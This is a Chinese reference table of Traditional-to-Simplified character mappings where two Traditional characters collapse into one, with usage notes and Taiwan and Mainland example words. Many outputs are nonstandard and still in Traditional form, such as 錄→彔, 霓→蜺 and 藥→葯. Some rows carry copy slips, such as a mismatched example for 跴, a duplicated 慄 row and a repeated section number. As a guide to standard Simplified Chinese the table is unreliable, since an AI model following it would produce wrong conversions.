寧 宁 -> 宁 eg. 寧可 (臺灣) 宁可 (大陸)
構 构 -> 构 eg. 構造 (臺灣) 构造 (大陸)
種 种 -> 种 eg. 品種 (臺灣) 品种 (大陸)
網 网 -> 网 eg. 網路 (臺灣) 网絡 (大陸)
與 与 -> 与 eg. 參與 (臺灣) 參与 (大陸)
貍 狸 -> 狸 eg. 貍貓 (臺灣) 狸貓 (大陸)
趕 赶 -> 赶 eg. 追趕 (臺灣) 追赶 (大陸)
價 价 -> 价 eg. 價格 (臺灣) 价格 (大陸)
廠 厂 -> 厂 eg. 工廠 (臺灣) 工厂 (大陸)
憐 怜 -> 怜 eg. 憐惜 (臺灣) 怜惜 (大陸)
暱 昵 -> 昵 eg. 暱稱 (臺灣) 昵稱 (大陸)
確 确 -> 确 eg. 確定 (臺灣) 确定 (大陸)
適 适 -> 适 eg. 適應 (臺灣) 适應 (大陸)
噸 吨 -> 吨 eg. 公噸 (臺灣) 公吨 (大陸)
據 据 -> 据 eg. 數據 (臺灣) 數据 (大陸)
機 机 -> 机 eg. 機器 (臺灣) 机器 (大陸)
澱 淀 -> 淀 eg. 沈澱 (臺灣) 沈淀 (大陸)
燉 炖 -> 炖 eg. 燉鍋 (臺灣) 炖鍋 (大陸)
築 筑 -> 筑 eg. 建築 (臺灣) 建筑 (大陸)
踴 踊 -> 踊 eg. 踴躍 (臺灣) 踊躍 (大陸)
錄 彔 -> 彔 eg. 錄製 (臺灣) 彔製 (大陸)
霓 蜺 -> 蜺 eg. 霓虹 (臺灣) 蜺虹 (大陸)
優 优 -> 优 eg. 優秀 (臺灣) 优秀 (大陸)
嶺 岭 -> 岭 eg. 山嶺 (臺灣) 山岭 (大陸)
濘 泞 -> 泞 eg. 泥濘 (臺灣) 泥泞 (大陸)
牆 墻 -> 墻 eg. 牆壁 (臺灣) 墻壁 (大陸)
櫃 柜 -> 柜 eg. 櫃子 (臺灣) 柜子 (大陸)
蟲 虫 -> 虫 eg. 昆蟲 (臺灣) 昆虫 (大陸)
豐 丰 -> 丰 eg. 豐富 (臺灣) 丰收 (大陸)
離 离 -> 离 eg. 離開 (臺灣) 离開 (大陸)
壞 坏 -> 坏 eg. 壞掉 (臺灣) 坏掉 (大陸)
懷 怀 -> 怀 eg. 懷念 (臺灣) 怀念 (大陸)
繭 茧 -> 茧 eg. 抽絲剝繭 抽絲剝茧
臘 腊 -> 腊 eg. 臘肉 (臺灣) 腊肉 (大陸)
藥 葯 -> 葯 eg. 醫藥 (臺灣) 醫葯 (大陸)
癢 痒 -> 痒 eg. 搔癢 (臺灣) 搔痒 (大陸)
蘋 苹 -> 苹 eg. 蘋果 (臺灣) 苹果 (大陸)
蠔 蚝 -> 蚝 eg. 蠔油 (臺灣) 蚝油 (大陸)
觸 触 -> 触 eg. 接觸 (臺灣) 接触 (大陸)
鏽 銹 -> 銹 eg. 生鏽 (臺灣) 生銹 (大陸)
蠟 蜡 -> 蜡 eg. 蠟燭 (臺灣) 蜡燭 (大陸)
灑 洒 -> 洒 eg. 灑水 (臺灣) 洒水 (大陸)
聽 听 -> 听 eg. 聽見 (臺灣) 听見 (大陸)
曬 晒 -> 晒 eg. 日曬 (臺灣) 日晒 (大陸)
驚 惊 -> 惊 eg. 驚慌 (臺灣) 惊慌 (大陸)
體 体 -> 体 eg. 身體 (臺灣) 身体 (大陸)
蠶 蚕 -> 蚕 eg. 蠶絲 (臺灣) 蚕絲 (大陸)
鹼 堿 -> 堿 eg. 鹼性 (臺灣) 堿性 (大陸)
籬 篱 -> 篱 eg. 籬笆 (臺灣) 篱笆 (大陸)
鑽 鉆 -> 鉆 eg. 鑽石 (臺灣) 鉆石 (大陸)
淨 凈 -> 凈 eg. 乾淨 (臺灣) 乾凈 (大陸)
懺 忏 -> 忏 eg. 懺悔 (臺灣) 忏悔 (大陸)

■5.二對一繁轉簡:完全無關

1)一繁體字與一繁體字,在簡體系統對應到同一簡體字。
2)兩個字通常同音,但形、意兩者在繁體系統「完全無關」。
3)兩字通常是硬湊成一起,歸簡成同一簡體字。


繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
弔 吊 -> 吊 弔喪 吊橋 (臺灣) 吊喪 吊橋 (大陸)
齣 出 -> 出 eg. 一齣戲 出品 一出戲 出品
纔 才 -> 才 eg. 纔要 才能 (臺灣) 才要 才能 (大陸)
鬱 郁 -> 郁 eg. 鬱悶 馥郁 (臺灣) 郁悶 馥郁 (大陸)
鬥 斗 -> 斗 eg. 鬥智 北斗 (臺灣) 斗智 北斗 (大陸)
彆 別 -> 別 eg. 彆扭 別人 (臺灣) 別扭 別人 (大陸)
傑 杰 -> 杰 eg. 傑出 人杰 (臺灣) 杰出 人杰 (大陸)
劃 划 -> 划 eg. 計劃 划船 (臺灣) 計划 划船 (大陸)
穀 谷 -> 谷 eg. 稻穀 山谷 (臺灣) 稻谷 山谷 (大陸)
範 范 -> 范 eg. 典範 范 (姓氏) 典范 范 (姓氏)
於 于 -> 于 eg. 於是 于 (姓氏) 于是 于 (姓氏)
瞭 了 -> 了 eg. 明瞭 了 (語尾詞) 明了 了 (語尾詞)
籲 吁 -> 吁 eg. 呼籲 長吁短嘆 呼吁 長吁短嘆
髮 發 -> 發 eg. 頭髮 發生 (臺灣) 頭發 發生 (大陸)
幾 几 -> 几 eg. 幾許 茶几 (臺灣) 几許 茶几 (大陸)
蔔 卜 -> 卜 eg. 蘿蔔 卜卦 (臺灣) 蘿卜 卜卦 (大陸)
醜 丑 -> 丑 eg. 醜事 小丑 (臺灣) 丑事 小丑 (臺灣)

■6.二對一繁轉簡:異體字 (正->簡)

1)一異體字與一正體字,在簡體系統對應到同一正體字。
2)在繁體文章裡面,兩者意義相同。也通行用這些用字。

正 異 簡体 繁體辭彙 簡体詞匯
====================================================================
仿 倣 -> 仿 eg. 模仿 (臺灣) 模仿 (大陸)
冢 塚 -> 冢 eg. 荒冢 (臺灣) 荒冢 (大陸)
焰 燄 -> 焰 eg. 火焰 (臺灣) 火焰 (大陸)
蓑 簑 -> 蓑 eg. 簑衣 (臺灣) 蓑衣 (大陸)
嘗 嚐 -> 嘗 eg. 品嘗 (臺灣) 品嘗 (大陸)
榨 搾 -> 榨 eg. 壓榨 (臺灣) 壓榨 (大陸)
捶 搥 -> 捶 eg. 捶胸頓足 捶胸頓足
勛 勳 -> 勛 eg. 勛章 (臺灣) 勛章 (大陸)
濕 溼 -> 濕 eg. 濕度 (臺灣) 濕度 (大陸)
乃 迺 -> 乃 eg. 乃 (臺灣) 乃 (大陸)
悖 誖 -> 悖 eg. 悖逆 (臺灣) 悖逆 (大陸)
斂 歛 -> 斂 eg. 收斂 (臺灣) 收歛 (大陸)
痴 癡 -> 痴 eg. 痴呆 (臺灣) 痴呆 (大陸)
棹 櫂 -> 棹 eg. 櫂歌 (臺灣) 棹歌 (大陸)
璇 璿 -> 璇 eg. 璿璣 (臺灣) 璇璣 (大陸)
攢 儹 -> 攢 eg. 儹錢 (臺灣) 攢錢 (大陸)
妝 粧 -> 妝 eg. 梳妝 (臺灣) 梳粧 (大陸)
錘 鎚 -> 錘 eg. 釘鎚 (臺灣) 釘錘 (大陸)
鋪 舖 -> 鋪 eg. 床舖 (臺灣) 床鋪 (大陸)
瞠 瞋 -> 瞠 eg. 瞋目 (臺灣) 瞠目 (大陸)
搧 煽 -> 煽 eg. 搧風 (臺灣) 煽風 (大陸)
磷 燐 -> 磷 eg. 燐火 (臺灣) 磷火 (大陸)
熔 鎔 -> 熔 eg. 鎔接 (臺灣) 熔化 (大陸)
咽 嚥 -> 咽 eg. 嚥下 (臺灣) 咽喉 (大陸)


■6.二對一繁轉簡:異體字 (異->簡)


正 異 簡体 繁體辭彙 簡体詞匯
====================================================================
簾 帘 -> 帘 eg. 窗簾 (臺灣) 窗帘 (大陸)
撢 撣 -> 撣 eg. 撢子 (臺灣) 撣子 (大陸)
證 証 -> 証 eg. 證據 (臺灣) 証據 (大陸)
豔 艷 -> 艷 eg. 豔麗 (臺灣) 艷麗 (大陸)
脣 唇 -> 唇 eg. 脣膏 (臺灣) 唇膏 (大陸)
閒 閑 -> 閑 eg. 空閒 (臺灣) 空閑 (大陸)
傭 佣 -> 佣 eg. 傭人 (臺灣) 佣人 (大陸)
濬 浚 -> 浚 eg. 濬深 (臺灣) 浚深 (大陸)
簷 檐 -> 檐 eg. 屋簷 (臺灣) 屋檐 (大陸)
蝨 虱 -> 虱 eg. 蝨子 虱目魚 虱子 虱目魚
莊 庄 -> 庄 eg. 莊園 (臺灣) 庄園 (大陸)
恆 恒 -> 恒 eg. 恆久 (臺灣) 恒久 (大陸)
嫺 嫻 -> 嫻 eg. 嫺 (臺灣) 嫻 (大陸)
踡 蜷 -> 蜷 eg. 踡服 (臺灣) 蜷服 (大陸)
枒 椏 -> 椏 eg. 枝枒 (臺灣) 枝椏 (大陸)
摀 捂 -> 捂 eg. 捂住 (臺灣)捂住 (大陸)


■7.二對一繁轉簡:較古異體字

1)一較古異體字與一正體字,在簡體系統對應到同一正體字。
2)在繁體文章裡面,兩者意義相同。在明清的章回小說裡,通
行用這些用字。現代繁體已較少使用。
3)在簡轉繁的時候,不再轉回較古異體字,而代之以正體字。

古 今 簡体 繁體辭彙 簡体詞匯
====================================================================
毬 球 -> 球 eg. 皮毬 (臺灣) 皮球 (大陸)
喫 吃 -> 吃 eg. 喫飯 (臺灣) 吃飯 (大陸)
彊 強 -> 強 eg. 強悍 (臺灣) 強悍 (大陸)
谿 溪 -> 溪 eg. 谿谷 (臺灣) 溪谷 (大陸)
鎗 槍 -> 槍 eg. 金鎗 (臺灣) 金槍 (大陸)
譁 嘩 -> 嘩 eg. 諠譁 (臺灣) 喧嘩 (大陸)
譟 噪 -> 噪 eg. 鼓譟 (臺灣) 鼓噪 (大陸)
諠 喧 -> 喧 eg. 諠譁 (臺灣) 喧嘩 (大陸)
孃 娘 -> 娘 eg. 姑孃 (臺灣) 姑娘 (大陸)
蒐 搜 -> 搜 eg. 蒐集 (臺灣) 搜查 (大陸)
賸 剩 -> 剩 eg. 賸餘 (臺灣) 剩余 (大陸)
歎 嘆 -> 嘆 eg. 感歎 (臺灣) 感嘆 (大陸)
訢 欣 -> 欣 eg. 讙訢 (臺灣) 歡欣 (大陸)
僇 戮 -> 戮 eg. 僇力 (臺灣) 戮力 (大陸)
阨 厄 -> 厄 eg. 困阨 (臺灣) 困厄 (大陸)
旂 旗 -> 旗 eg. 旌旂 (臺灣) 旌旗 (大陸)
菴 庵 -> 庵 eg. 菴舍 尼姑庵 庵舍 尼姑庵
羶 膻 -> 膻 eg. 羶腥 (臺灣) 膻腥 (大陸)
勦 剿 -> 剿 eg. 勦匪 (臺灣) 剿匪 (大陸)
鼇 鰲 -> 鰲 eg. 鼇頭 (臺灣) 鰲頭 (大陸)
獮 獼 -> 獼 eg. 獮猴 (臺灣) 獼猴 (大陸)
埧 壩 -> 埧 eg. 水壩 (臺灣) 水埧 (大陸)
粺 稗 -> 稗 eg. 粺子 (臺灣) 稗子 (大陸)
薙 剃 -> 剃 eg. 剃頭 (臺灣) 剃頭 (大陸)
耑 專 -> 專 eg. 耑此 (臺灣) 專心 (大陸)
譆 嘻 -> 嘻 eg. 嘻笑 (臺灣) 嘻笑 (大陸)
頫 俯 -> 俯 eg. 俯首 (臺灣) 俯首 (大陸)
銲 焊 -> 焊 eg. 焊接 (臺灣) 焊接 (大陸)

■8.二對一繁轉簡:罕用異體字

1)一罕用異體字與一正體字,在簡體系統對應到同一正體字。
2)現代繁體已較少使用,或是以錯別字處理。
3)在簡轉繁的時候,不再轉回罕用異體字,而代之以正體字。

罕 今 簡体 繁體辭彙 簡体詞匯
====================================================================
煇 輝 -> 輝 eg. 光輝 (臺灣) 光輝 (大陸)
澣 浣 -> 浣 eg. 澣紗 (臺灣) 浣紗 (大陸)
躂 踏 -> 踏 eg. 踢躂舞 (臺灣) 踢踏舞(大陸)
勣 績 -> 績 eg. 考勣 (臺灣) 考績 (大陸)
迆 迤 -> 迤 eg. 逶迆 (臺灣) 逶迤 (大陸)
搆 構 -> 構 eg. 搆造 (臺灣) 構造 (大陸)
炤 照 -> 照 eg. 炤耀 (臺灣) 照耀 (大陸)
煖 暖 -> 暖 eg. 溫煖 (臺灣) 溫暖 (大陸)
繈 襁 -> 襁 eg. 繈褓 (臺灣) 襁褓 (大陸)
鯈 鰷 -> 鰷 eg. 白鯈 (臺灣) 白鰷 (大陸)
庂 仄 -> 仄 eg. 平庂 (臺灣) 平仄 (大陸)
阯 址 -> 址 eg. 地阯 (臺灣) 地址 (大陸)
攷 考 -> 考 eg. 攷核 (臺灣) 考核 (大陸)
佪 徊 -> 徊 eg. 俳佪 (臺灣) 徘徊 (大陸)
謚 諡 -> 謚 eg. 追諡 (臺灣) 追謚 (大陸)
欞 櫺 -> 櫺 eg. 窗欞 (臺灣) 窗櫺 (大陸)
敺 驅 -> 驅 eg. 敺趕 (臺灣) 驅趕 (大陸)
伝 傳 -> 傳 eg. 伝記 (臺灣) 傳記 (大陸)
疿 痱 -> 痱 eg. 疿子 (臺灣) 痱子 (大陸)
欸 唉 -> 唉 eg. 欸 (臺灣) 唉 (大陸)
篠 筱 -> 筱 eg. 篠子 (臺灣) 筱子 (大陸)
撦 扯 -> 扯 eg. 拉撦 (臺灣) 拉扯 (大陸)
眯 瞇 -> 瞇 eg. 眯眯 (臺灣) 瞇瞇 (大陸)
慴 懾 -> 懾 eg. 慴伏 (臺灣) 懾服 (大陸)
碪 砧 -> 砧 eg. 碪板 (臺灣) 砧板 (大陸)
槼 規 -> 規 eg. 槼矩 (臺灣) 規矩 (大陸)
踰 逾 -> 逾 eg. 踰越 (臺灣) 逾越 (大陸)
遶 繞 -> 繞 eg. 遶境 (臺灣) 繞境 (大陸)
縚 絛 -> 絛 eg. 縚 (臺灣) 絛蟲 (大陸)
蕓 芸 -> 芸 eg. 蕓 (臺灣) 芸 (大陸)
嬭 奶 -> 奶 eg. 阿嬭 (臺灣) 阿奶 (大陸)
痹 痺 -> 痺 eg. 麻痹 (臺灣) 麻痺 (大陸)
鴈 雁 -> 雁 eg. 孤鴈 (臺灣) 孤雁 (大陸)
癈 廢 -> 廢 eg. 癈物 (臺灣) 廢物 (大陸)
篲 彗 -> 彗 eg. 篲星 (臺灣) 彗星 (大陸)
嬾 懶 -> 懶 eg. 嬌嬾 (臺灣) 嬌懶 (大陸)
艣 櫓 -> 櫓 eg. 搖艣 (臺灣) 搖櫓 (大陸)
蠼 蠷 -> 蠷 eg. 蠼猱 (臺灣) 蠷猱 (大陸)
戉 鉞 -> 鉞 eg. 戉 (臺灣) 鉞 (大陸)
墝 磽 -> 磽 eg. 墝薄 (臺灣) 磽薄 (大陸)
偪 逼 -> 逼 eg. 逼迫 (臺灣) 逼迫 (大陸)
跴 踩 -> 踩 eg. 踩踏 (臺灣) 逼迫 (大陸)
筴 策 -> 策 eg. 政策 (臺灣) 政策 (大陸)
刱 創 -> 創 eg. 創造 (臺灣) 創造 (大陸)
焠 淬 -> 淬 eg. 淬勉 (臺灣) 淬勉 (大陸)
荅 答 -> 答 eg. 答案 (臺灣) 答案 (大陸)
敁 掂 -> 掂 eg. 掂掂斤兩 掂掂斤兩
啑 喋 -> 喋 eg. 喋喋不休 喋喋不休
蜨 蝶 -> 蝶 eg. 蝴蝶 (臺灣) 蝴蝶 (大陸)
椗 碇 -> 碇 eg. 石碇 (臺灣) 石碇 (大陸)
尒 爾 -> 爾 eg. 爾等 (臺灣) 爾等 (大陸)
雰 氛 -> 氛 eg. 氣氛 (臺灣) 氣氛 (大陸)
婐 婀 -> 婀 eg. 婀娜 (臺灣) 婀娜 (大陸)
颿 帆 -> 帆 eg. 帆布 (臺灣) 帆布 (大陸)
敪 掇 -> 掇 eg. 掇弄 (臺灣) 掇弄 (大陸)


罕 今 簡体 繁體辭彙 簡体詞匯
====================================================================
睾 睪 -> 睾 eg. 睪丸 (臺灣) 睾丸 (大陸)
篪 箎 -> 篪 eg. 箎 (臺灣) 篪 (大陸)
瘛 瘈 -> 瘛 eg. 瘈狗 (臺灣) 瘛狗 (大陸)
鷴 鷳 -> 鷴 eg. 白鷳 (臺灣) 白鷴 (大陸)


■9.二對一繁轉簡:不可混用字根

1)一繁體字與一該字字根,在簡體系統對應到同一字根。
2)兩個字不同部首,但簡化的字根構成該繁體字的一部分。
3)在繁體系統,兩者意義不同,完全不可混用。


繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
鞦 秋 -> 秋 eg. 鞦韆 秋季(臺灣) 秋千 秋季 (大陸)
韆 千 -> 千 eg. 鞦韆 千百(臺灣) 秋千 千百 (大陸)
鬆 松 -> 松 eg. 輕鬆 松樹(臺灣) 輕松 松樹 (大陸)
糰 團 -> 團 eg. 飯糰 團結(臺灣) 飯團 團結 (大陸)
慾 欲 -> 欲 eg. 色慾 欲求(臺灣) 色欲 欲求 (大陸)
緻 致 -> 致 eg. 細緻 導致(臺灣) 細致 導致 (大陸)
鼕 冬 -> 冬 eg. 鼕鼕 冬季(臺灣) 冬冬 冬季 (大陸)
麵 面 -> 面 eg. 麵條 面子(臺灣) 面條 面子 (大陸)
鹹 咸 -> 咸 eg. 鹹海 咸豐(臺灣) 咸海 咸豐 (大陸)
鬚 須 -> 須 eg. 鬍鬚 必須(臺灣) 必須 必須 (大陸)
闢 辟 -> 辟 eg. 開闢 辟邪(臺灣) 開辟 辟邪 (大陸)
囍 喜 -> 喜 eg. 囍宴 喜事(臺灣) 喜宴 喜事 (大陸)
噁 惡 -> 惡 eg. 噁心 可惡(臺灣) 惡心 可惡 (大陸)
衊 蔑 -> 蔑 eg. 污衊 輕蔑(臺灣) 污蔑 輕蔑 (大陸)
伕 夫 -> 夫 eg. 馬伕 夫子(臺灣) 馬夫 夫子 (大陸)
兇 凶 -> 凶 eg. 兇惡 凶兆(臺灣) 凶惡 凶兆 (大陸)
剋 克 -> 克 eg. 剋星 克服(臺灣) 克星 克服 (大陸)
迴 回 -> 回 eg. 迴旋 回信(臺灣) 回旋 回信 (大陸)
唸 念 -> 念 eg. 唸書 想念(臺灣) 念書 想念 (大陸)
慄 栗 -> 栗 eg. 戰慄 栗子(臺灣) 戰栗 栗子 (大陸)
塗 涂 -> 涂 eg. 塗抹 涂(姓氏) 涂抹 涂 (姓氏)
樑 梁 -> 梁 eg. 樑柱 梁(姓氏) 梁柱 梁 (姓氏)
週 周 -> 周 eg. 週一 周(姓氏) 周一 周 (姓氏)
餘 余 -> 余 eg. 剩餘 余(姓氏) 剩余 余 (姓氏)
捨 舍 -> 舍 eg. 取捨 宿舍(臺灣) 取舍 宿舍 (大陸)
準 准 -> 准 eg. 準備 核准(臺灣) 准備 核准 (大陸)
徬 旁 -> 旁 eg. 徬徨 旁邊(臺灣) 旁徨 旁邊 (大陸)
瀰 彌 -> 彌 eg. 瀰漫 彌陀(臺灣) 彌漫 彌陀 (大陸)
雲 云 -> 云 eg. 雲彩 人云亦云 云彩 人云亦云
麼 么 -> 么 eg. 什麼 么兒(臺灣) 什么 么兒 (大陸)
製 制 -> 制 eg. 製造 制度(臺灣) 制造 制度 (大陸)
颳 刮 -> 刮 eg. 颳風 刮去(臺灣) 刮風 刮去 (大陸)
儘 盡 -> 盡 eg. 儘管 盡量(臺灣) 盡管 盡量 (大陸)
禦 御 -> 御 eg. 防禦 御用(臺灣) 防御 御用 (大陸)
錶 表 -> 表 eg. 手錶 表示(臺灣) 手表 表示 (大陸)
嵙 科 -> 科 eg. 嵙崁 科學(臺灣) 科坎 科學 (大陸)
荳 豆 -> 豆 eg. 荳蔻 綠豆(臺灣) 豆蔻 綠豆 (大陸)
倖 幸 -> 幸 eg. 倖免 幸運(臺灣) 幸免 幸運 (大陸)
睏 困 -> 困 eg. 睏倦 困難(臺灣) 困倦 困難 (大陸)
瑯 琅 -> 琅 eg. 琺瑯 琳琅(臺灣) 琺琅 琳琅 (大陸)
誇 夸 -> 夸 eg. 誇口 夸父(臺灣) 夸口 夸父 (大陸)
慇 殷 -> 殷 eg. 慇勤 殷商(臺灣) 殷勤 殷商 (大陸)
滷 鹵 -> 鹵 eg. 滷蛋 鹵素(臺灣) 鹵蛋 鹵素 (大陸)
釐 厘 -> 厘 eg. 公釐 公厘(臺灣) 公厘 公厘 (大陸)
潟 瀉 -> 瀉 eg. 潟湖 瀉藥(臺灣) 瀉湖 瀉藥 (大陸)
蓆 席 -> 席 eg. 草蓆 席位(臺灣) 草席 席位 (大陸)
扠 叉 -> 叉 eg. 扠手 交叉(臺灣) 叉手 交叉 (大陸)
丘 坵 -> 丘 eg. 丘(姓)烏坵(地) 丘(姓) 烏丘(地)
慄 栗 -> 栗 eg. 戰慄 栗子(臺灣) 戰栗 栗子 (大陸)
紮 扎 -> 扎 eg. 紮實 針扎(臺灣) 扎實 針扎 (大陸)
衕 同 -> 同 eg. 衚衕 胡同(臺灣) 胡同 胡同 (大陸)
衖 弄 -> 弄 eg. 巷衖 巷弄(臺灣) 巷弄 巷弄 (大陸)
懃 勤 -> 勤 eg. 慇懃 勤勞(臺灣) 殷勤 勤勞 (大陸)
燻 熏 -> 熏 eg. 燻肉 (臺灣) 熏肉 (大陸)


■10.二對一繁轉簡:可混用字根

1)一繁體字與一該字字根,在簡體系統對應到同一字根。
2)兩個字不同部首,但簡化的字根構成該繁體字的一部分。
3)在繁體系統,兩者部分意義可混用。

繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
吋 寸 -> 寸 eg. 英吋 尺寸(臺灣) 英寸 尺寸 (大陸)
佔 占 -> 占 eg. 佔據 霸占(臺灣) 占據 霸占 (大陸)
佈 布 -> 布 eg. 佈告 布匹(臺灣) 布告 布匹 (大陸)
呎 尺 -> 尺 eg. 英呎 尺寸(臺灣) 英尺 尺寸 (大陸)
崑 昆 -> 昆 eg. 崑崙 昆明(臺灣) 昆崙 昆明 (大陸)
崙 侖 -> 侖 eg. 崑崙 美侖(臺灣) 崑侖 美侖 (大陸)
捲 卷 -> 卷 eg. 捲軸 書卷(臺灣) 卷軸 書卷 (大陸)
硃 朱 -> 朱 eg. 硃砂 朱門(臺灣) 朱砂 朱門 (大陸)
傢 家 -> 家 eg. 傢俱 家庭(臺灣) 家俱 家庭 (大陸)
傚 效 -> 效 eg. 仿傚 生效(臺灣) 仿效 生效 (大陸)
揹 背 -> 背 eg. 揹負 背部(臺灣) 背負 背部 (大陸)
裊 嬝 -> 裊 eg. 嬝嬝婷婷 裊裊婷婷
僱 雇 -> 雇 eg. 解僱 雇員(臺灣) 解雇 雇員 (大陸)
誌 志 -> 志 eg. 雜誌 志氣(臺灣) 雜志 志氣 (大陸)
閤 合 -> 合 eg. 閤家 合作(臺灣) 合家 合作 (大陸)
霑 沾 -> 沾 eg. 均霑 沾染(臺灣) 均沾 沾染 (大陸)
餚 肴 -> 肴 eg. 菜餚 佳肴(臺灣) 菜肴 佳肴 (大陸)
鑑 鑒 -> 鑒 eg. 鑑別 鑒戒(臺灣) 鑒賞 鑒戒 (大陸)
籥 龠 -> 龠 eg. 籥 龠(臺灣) 龠 龠 (大陸)
讚 贊 -> 贊 eg. 讚賞 贊成(臺灣) 贊賞 贊成 (大陸)
婼 若 -> 若 eg. 婼羌 (地名) 若羌 (地名)
塱 朗 -> 朗 eg. 元塱 (地名) 元朗 (地名)

■11.二對一繁轉簡:狹義字→廣義字

1)一繁體狹義字與一繁體廣義字,在簡體系統對應到同一簡體
廣義字。
2)後者意義較廣可以包含前者用法,但是前者不能包含後者。

狹 廣 簡体 繁體辭彙 簡体詞匯
====================================================================
碁 棋 -> 棋 eg. 宏碁 圍棋
夥 伙 -> 伙 eg. 夥伴 伙食 (臺灣) 伙伴 (大陸)
擣 搗 -> 搗 eg. 擣衣 搗毀
籐 藤 -> 藤 eg. 籐器 藤蔓
饑 飢 -> 飢 eg. 饑荒 飢餓 (臺灣) 飢荒 飢餓 (大陸)
襬 擺 -> 擺 eg. 裙襬 擺動
黴 霉 -> 霉 eg. 黴菌 霉運
籤 簽 -> 簽 eg. 簽名 標籤 (臺灣) 簽名 標簽 (大陸)
殭 僵 -> 僵 eg. 殭屍 僵化
晞 曦 -> 曦 eg. 晨曦 晞微 (臺灣) 晨曦
脩 修 -> 修 eg. 束脩 修養 (臺灣) 修身
餬 糊 -> 糊 eg. 餬口 漿糊
餽 饋 -> 饋 eg. 餽贈 反饋
颺 揚 -> 揚 eg. 飛颺 發揚
藷 薯 -> 薯 eg. 甘藷 薯條
瓖 鑲 -> 鑲 eg. 玉瓖 鑲嵌
釁 舋 -> 舋 eg. 挑釁
杇 圬 -> 圬 eg. 杇者 圬者
抴 曳 -> 曳 eg. 抴 拖曳
覈 核 -> 核 eg. 檢覈 考核
闇 暗 -> 暗 eg. 闇然 暗地
礩 躓 -> 躓 eg. 礩 顛躓
洩 泄 -> 泄 eg. 發洩 發泄
牴 抵 -> 抵 eg. 牴觸 抵擋
觔 筋 -> 筋 eg. 觔斗 腦筋
玆 茲 -> 茲 eg. 玆 赫茲
砲 炮 -> 炮 eg. 大砲 炮竹
祕 秘 -> 秘 eg. 秘書 秘密
勗 勖 -> 勖 eg. 勗勉 勖
絃 弦 -> 弦 eg. 續絃 管弦
痠 酸 -> 酸 eg. 痠痛 酸性
暘 陽 -> 陽 eg. 暘 太陽
綑 捆 -> 捆 eg. 綑綁 捆綁
僕 仆 -> 仆 eg. 僕人 仆倒
槓 杠 -> 杠 eg. 槓桿 杠杆
槃 盤 -> 盤 eg. 涅槃 盤子
箇 個 -> 個 eg. 一箇 一個
撲 扑 -> 扑 eg. 撲向 扑向
樸 朴 -> 朴 eg. 樸實 朴子
鬨 哄 -> 哄 eg. 鬨堂 哄騙
鍊 鏈 -> 鏈 eg. 鍊子 鏈條
薦 荐 -> 荐 eg. 推薦 推荐
蹟 跡 -> 跡 eg. 古蹟 痕跡
鎚 錘 -> 錘 eg. 釘鎚 鐵錘
祐 佑 -> 佑 eg. 護佑 (臺灣) 護佑 (大陸)

■12.二對一繁轉簡:繁罕字→簡常字

1)一繁體罕用字與一繁體常用字,在簡體系統對應到同一簡體
常用字。
2)繁體罕用字、錯誤字或俗字,單向轉為簡體常用字
3)在簡轉繁的時候,不再轉回罕用異體字,而代之以正體字。

罕 常 簡体 繁體辭彙 簡体詞匯
====================================================================
汙 污 -> 污 eg. 污染 (臺灣) 污染 (大陸)
汍 丸 -> 丸 eg. 丸子 (臺灣) 丸子 (大陸)
阬 坑 -> 坑 eg. 坑道 (臺灣) 坑道 (大陸)
甽 圳 -> 圳 eg. 圳溝 (臺灣) 圳溝 (大陸)
屝 扉 -> 扉 eg. 心扉 (臺灣) 心扉 (大陸)
琍 璃 -> 璃 eg. 琉璃 (臺灣) 琉璃 (大陸)
覜 眺 -> 眺 eg. 眺望 (臺灣) 眺望 (大陸)
箠 棰 -> 棰 eg. 棰楚 (臺灣) 棰楚 (大陸)
蔆 菱 -> 菱 eg. 菱角 (臺灣) 菱角 (大陸)
壎 塤 -> 塤 eg. 塤 (臺灣) 塤 (大陸)
擭 護 -> 護 eg. 保護 (臺灣) 保護 (大陸)
鍚 錫 -> 錫 eg. 錫礦 (臺灣) 錫礦 (大陸)
繙 翻 -> 翻 eg. 翻臉 (臺灣) 翻臉 (大陸)
毌 毋 -> 毋 eg. 毋 (臺灣) 毋 (大陸)
肊 臆 -> 臆 eg. 臆測 (臺灣) 臆測 (大陸)
匟 炕 -> 炕 eg. 炕上 (臺灣) 炕上 (大陸)
穵 挖 -> 挖 eg. 挖掘 (臺灣) 挖掘 (大陸)
抃 拚 -> 拚 eg. 拚命 (臺灣) 拚命 (大陸)
扺 抵 -> 抵 eg. 抵擋 (臺灣) 抵擋 (大陸)
皁 皂 -> 皂 eg. 肥皂 (臺灣) 肥皂 (大陸)
肐 胳 -> 胳 eg. 胳膊 (臺灣) 胳膊 (大陸)
岧 迢 -> 迢 eg. 迢迢 (臺灣) 迢迢 (大陸)
怳 恍 -> 恍 eg. 恍然 (臺灣) 恍然 (大陸)
拑 鉗 -> 鉗 eg. 鉗子 (臺灣) 鉗子 (大陸)
枙 梔 -> 梔 eg. 梔杷 (臺灣) 梔杷 (大陸)
殀 夭 -> 夭 eg. 夭折 (臺灣) 夭折 (大陸)
泝 溯 -> 溯 eg. 溯水 (臺灣) 溯水 (大陸)
玡 琊 -> 琊 eg. 瑯琊 (臺灣) 琅琊 (大陸)
疘 肛 -> 肛 eg. 肛門 (臺灣) 肛門 (大陸)
肮 骯 -> 骯 eg. 骯髒 (臺灣) 骯髒 (大陸)
茍 苟 -> 苟 eg. 苟延 (臺灣) 苟延 (大陸)
柟 楠 -> 楠 eg. 楠木 (臺灣) 楠木 (大陸)
毘 毗 -> 毗 eg. 毗鄰 (臺灣) 毗鄰 (大陸)
玅 妙 -> 妙 eg. 玄妙 (臺灣) 玄妙 (大陸)
祅 祆 -> 祆 eg. 祆教 (臺灣) 祆教 (大陸)
籸 糝 -> 糝 eg. 糝飯 (臺灣) 糝飯 (大陸)
捄 救 -> 救 eg. 救援 (臺灣) 救援 (大陸)
栒 旬 -> 旬 eg. 中旬 (臺灣) 中旬 (大陸)
栔 契 -> 契 eg. 契約 (臺灣) 契約 (大陸)
欱 喝 -> 喝 eg. 喝水 (臺灣) 喝水 (大陸)
荍 蕎 -> 蕎 eg. 蕎麥 (臺灣) 蕎麥 (大陸)
迻 移 -> 移 eg. 移動 (臺灣) 移動 (大陸)
陜 陝 -> 陝 eg. 陝西 (臺灣) 陝西 (大陸)
埜 野 -> 野 eg. 野外 (臺灣) 野外 (大陸)
婬 淫 -> 淫 eg. 淫蕩 (臺灣) 淫蕩 (大陸)
惏 婪 -> 婪 eg. 貪婪 (臺灣) 貪婪 (大陸)
